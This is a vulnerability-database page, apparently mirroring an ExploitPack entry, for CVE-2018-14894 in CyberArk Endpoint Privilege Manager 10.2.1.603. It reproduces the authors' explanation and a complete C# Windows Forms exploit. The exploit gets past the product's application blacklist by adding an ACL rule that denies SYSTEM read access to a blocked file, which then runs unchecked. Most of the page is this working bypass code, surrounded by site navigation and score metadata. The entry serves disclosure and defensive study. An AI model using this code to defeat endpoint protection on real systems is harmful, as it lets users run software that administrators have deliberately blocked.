Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackAlpcan OnaranEXPLOITPACK:B7E902F322A50D857C7E249DA3E3176A
HistoryApr 12, 2019 - 12:00 a.m.

CyberArk EPM 10.2.1.603 - Security Restrictions Bypass

2019-04-1200:00:00
Alpcan Onaran
10

0.002 Low

EPSS

Percentile

55.2%

JSON

CyberArk EPM 10.2.1.603 - Security Restrictions Bypass

# Exploit Title: CyberArk Endpoint bypass 
# Google Dork: -
# Date: 03/06/2018
# Exploit Author: Alpcan Onaran, Mustafa Kemal Can
# Vendor Homepage: https://www.cyberark.com
# Software Link: -
# Version: 10.2.1.603
# Tested on: Windows 10
# CVE : CVE-2018-14894

//If user needs admin privileges, CyberArk gives the admin token to user for spesific process not for the whole system. It is cool idea.
//This product also has a function called β€œApplication Blacklist”. You probably know what that means.
//It helps you to block to execute specified application by CyberArk admin. In normal cases, you can not be able to start this process even with admin rights.
//But We found very interesting trick to make CyberArk blind completely.All you need to do, revoke read privileges for system on the file that you want to open it.
//After you do that, CyberArk EPM can not be able to get information about your blocked file and it just let them execute

This exploit works on CyberArk EPM 10.2.1.603 and below. (Tested on Windows 10 x64)
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System;
using System.IO;
using System.Security.AccessControl;

namespace raceagainstthesystem
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void btn_change_access_control_Click(object sender, EventArgs e)
        {
            string fileName = txt_filepath.Text;
            FileSecurity fSecurity = File.GetAccessControl(fileName);
            fSecurity.AddAccessRule(new FileSystemAccessRule(@"SYSTEM",
                    FileSystemRights.ReadData, AccessControlType.Deny));
            File.SetAccessControl(fileName, fSecurity);

            /*
            fSecurity.RemoveAccessRule(new FileSystemAccessRule(@"SYSTEM",
                    FileSystemRights.ReadData, AccessControlType.Allow));
            */

            File.SetAccessControl(fileName, fSecurity);
        }

        private void btn_choseFile_Click(object sender, System.EventArgs e)
        {
            OpenFileDialog choofdlog = new OpenFileDialog();
            choofdlog.Filter = "All Files (*.*)|*.*";
            choofdlog.FilterIndex = 1;
            choofdlog.Multiselect = true;

            string sFileName = "";

            if (choofdlog.ShowDialog() == DialogResult.OK)
            {
                sFileName = choofdlog.FileName;
                string[] arrAllFiles = choofdlog.FileNames; //used when Multiselect = true           
            }
            txt_filepath.Text = sFileName;
        }
    }
}

Related

nvd 1
cve 1
zdt 1
packetstorm 1
cvelist 1
prion 1
exploitdb 1
nvd
nvd
CVE-2018-14894
2019-04-09 18:29:00
cve
cve
CVE-2018-14894
2019-04-09 18:29:00
zdt
zdt
CyberArk EPM 10.2.1.603 - Security Restrictions #Bypass Exploit
2019-04-12 00:00:00
packetstorm
packetstorm
CyberArk EPM 10.2.1.603 Security Restrictions Bypass
2019-04-12 00:00:00
cvelist
cvelist
CVE-2018-14894
2019-04-09 17:27:16
prion
prion
Design/Logic Flaw
2019-04-09 18:29:00
exploitdb
exploitdb
CyberArk EPM 10.2.1.603 - Security Restrictions Bypass
2019-04-12 00:00:00

0.002 Low

EPSS

Percentile

55.2%

JSON
Related for EXPLOITPACK:B7E902F322A50D857C7E249DA3E3176A
nvd1cve1zdt1packetstorm1cvelist1prion1exploitdb1